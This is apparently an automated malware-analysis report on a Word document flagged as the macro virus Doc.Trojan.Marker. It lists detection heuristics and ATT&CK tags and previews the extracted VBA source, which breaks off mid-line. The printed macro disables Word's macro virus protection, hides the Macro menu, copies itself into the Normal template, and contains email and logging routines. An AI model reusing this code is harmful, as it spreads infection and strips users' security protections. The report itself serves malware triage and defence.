MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is designed to disable macro virus protection and remove the 'Macro' option from the Tools menu. This action aims to prevent the user from being alerted to or disabling malicious macros, thereby facilitating further execution. The embedded Office document and OLE slack anomalies suggest a packed or obfuscated payload.
Heuristics 6
-
ClamAV: Doc.Trojan.Marker-35 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-35
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 28,953 bytes but its declared streams total only 0 bytes — 28,953 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThe file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43339 bytes |
SHA-256: 522c9d9899d655cbfea6a216ff721fa024203e9ac642998f2f527060ad3974eb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Son, Be a Good Boy !
Const Marker = "<- this is a marker! by fs080298"
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = 1 Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = 0
CommandBars("Tools").Controls("Macro").Delete
Else
CommandBars("Tools").Controls("Macro").Delete
End If
Options.VirusProtection = False
If Month(Now) = 1 And Day(Now) < 10 Then Message$ = "HAPPY NEW YEAR " & Year(Now) & " ! From : «(¤¿¤)» Me !"
If Day(Now) = ((64 / 8) - 2 + 10 - (6 + 2)) And Month(Now) = ((30 / 6) + (4 / 2) + 4 - 5) Then Message$ = "Today Is My Birthday ! Thank's For Your Greeting..."
If Day(Now) = ((25 / 5) - 2 + 10 + 14) And Month(Now) = (2 ^ 5) - 30 + 5 Then Message$ = "Happy Birthday Honey, I Love U So Much..."
If Day(Now) = (3 ^ 6) - 700 + (2 ^ 3) - 22 And Month(Now) = (5 ^ 3) - 120 + 7 Then Message$ = "Happy Birthday, Son ! Be a Good Boy..."
If Message$ <> "" Then MsgBox Message$, vbInformation, "From : <(¤¿¤)>"
Message$ = ""
Document_Close
End Sub
Private Sub Document_Close()
Dim nmod As Object
Dim isd As String
Dim DS, NTS, DI, NTI As Boolean
Dim EmailMe, Users, LogData, LogFile As String
On Error Resume Next
If Right(Marker, 8) <> Chr(102) + Chr(115) + Chr(48) + Chr(56) + Chr(48) + Chr(50) + Chr(57) + Chr(56) Then GoTo Finish
AddIns.Unload True
Application.UserName = "fs080298"
Application.UserInitials = "FS2000"
Application.UserAddress = "fs080298@yeayea.com"
Application.EnableCancelKey = wdCancelDisabled
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "" And Mid(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(121, 1), 33, 8) <> Chr$(70) + Chr$(83) + Chr$(48) + Chr$(56) + Chr$(48) + Chr$(50) + Chr$(57) + Chr$(56) Then GoTo Finish
GoSub Sisipin
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", _
"LogData in") = False) Then GoSub LoggingIn
GoSub EmailMePlease
GoTo Finish
Sisipin:
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "" And NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> Chr(32) + Chr$(39) + Chr$(83) + Chr$(111) + Chr$(110) + Chr$(44) + Chr$(32) + Chr$(66) + Chr$(101) + Chr$(32) + Chr$(97) + Chr$(32) + Chr$(71) + Chr$(111) + Chr$(111) + Chr$(100) + Chr$(32) + Chr$(66) + Chr$(111) + Chr$(121) + Chr$(32) + Chr$(33) Then Return
DI = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NTI = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "" And Mid(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(95, 1), 119, 20) <> Chr$(32) + Chr$(169) + Chr$(32) + Chr$(72) + Chr$(97) + Chr$(118) + Chr$(101) + Chr$(32) + Chr$(97) + Chr$(32) + Chr$(78) + Chr$(105) + Chr$(99) + Chr$(101) + Chr$(32) + Chr$(68) + Chr$(97) + Chr$(121) + Chr$(32) + Chr$(33) Then Return
If (DI Xor NTI) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
If DI Then
NTS = NormalTemplate.Saved
EmailMe = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
For i = 1 To Len(Application.UserAddress)
If (Mid(Application.UserAddress, i, 1) <> Chr(13)) Then
If (Mid(Application.UserAddress
... (truncated)
|
|||
embedded_office_off0000b2e7.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0xB2E7 | 28953 bytes |
SHA-256: 65abc523d111bee451736b35d9899ba6af8003754342e72eb2f54a1b9ec7fc7d |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.